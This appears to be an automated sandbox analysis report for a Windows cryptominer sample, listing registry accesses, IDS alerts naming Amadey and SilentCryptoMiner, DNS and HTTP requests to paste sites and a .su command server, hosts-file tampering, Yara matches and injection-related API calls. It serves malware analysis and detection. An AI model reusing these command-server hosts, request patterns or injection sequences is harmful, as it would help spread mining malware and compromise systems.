          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8CE110 FindFirstFileExW,32_2_000001D29E8CE110
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165EE110 FindFirstFileExW,50_2_000002D0165EE110
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F151E110 FindFirstFileExW,64_2_000002D6F151E110
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B0E110 FindFirstFileExW,68_2_00000146F6B0E110
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FDE110 FindFirstFileExW,69_2_0000014E41FDE110
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B08E110 FindFirstFileExW,70_2_000001D15B08E110

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.6:49760 -> 188.114.97.3:443
          Connects to a pastebin service (likely for C&C)
          Source: unknownDNS query: name: rentry.co
          Source: unknownDNS query: name: justpaste.it
          Source: unknownDNS query: name: pastebin.com
          Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
          Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
          Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: ESPOL-ASPL ESPOL-ASPL
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Network trafficSuricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.6:61214 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:65333 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:65331 -> 188.114.97.3:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /5apf98os/raw HTTP/1.1Accept: */*Connection: closeHost: rentry.coUser-Agent: cpp-httplib/0.12.6
          Source: global trafficHTTP traffic detected: GET /f86v1 HTTP/1.1Accept: */*Connection: closeHost: justpaste.itUser-Agent: cpp-httplib/0.12.6
          Source: global trafficHTTP traffic detected: GET /raw/sFxN07Y7 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
          Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
          Source: global trafficDNS traffic detected: DNS query: rentry.co
          Source: global trafficDNS traffic detected: DNS query: justpaste.it
          Source: global trafficDNS traffic detected: DNS query: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
          Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 374Content-Type: application/jsonHost: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.suUser-Agent: cpp-httplib/0.12.6
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6C65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: lsass.exe, 00000040.00000003.2552488160.000002D6F0CF2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcb.com/rh.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcb.com/rh.crt0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://rh.symcd.com0&
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
          Source: updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000001D.00000002.2211112447.00000217D7B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 0000001D.00000002.2254826196.00000217EEEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coP
          Source: powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65331
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 65333 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65331 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65333
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Modifies the hosts file
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E0B8 NtUnmapViewOfSection,29_2_00007FFD3467E0B8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E12C NtResumeThread,29_2_00007FFD3467E12C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E10C NtSetContextThread,29_2_00007FFD3467E10C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E0EA NtWriteVirtualMemory,29_2_00007FFD3467E0EA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E098 NtUnmapViewOfSection,29_2_00007FFD3467E098
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD34680C6D NtWriteVirtualMemory,29_2_00007FFD34680C6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD3467E11C NtSetContextThread,29_2_00007FFD3467E11C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD34680A4E NtUnmapViewOfSection,29_2_00007FFD34680A4E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD34680F30 NtSetContextThread,29_2_00007FFD34680F30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FFD34680FF4 NtResumeThread,29_2_00007FFD34680FF4
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140001860 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,45_2_0000000140001860
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165E2990 NtEnumerateValueKey,NtEnumerateValueKey,50_2_000002D0165E2990
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F151211C NtQuerySystemInformation,StrCmpNIW,64_2_000002D6F151211C
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F1512604 NtQueryDirectoryFileEx,GetFileType,StrCpyW,64_2_000002D6F1512604
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001394 NtMapCMFModule,65_2_0000000140001394
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD346A0C5D NtWriteVirtualMemory,67_2_00007FFD346A0C5D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD346A0F20 NtSetContextThread,67_2_00007FFD346A0F20
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD3469DF98 NtUnmapViewOfSection,67_2_00007FFD3469DF98
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 67_2_00007FFD346A0FE4 NtResumeThread,67_2_00007FFD346A0FE4
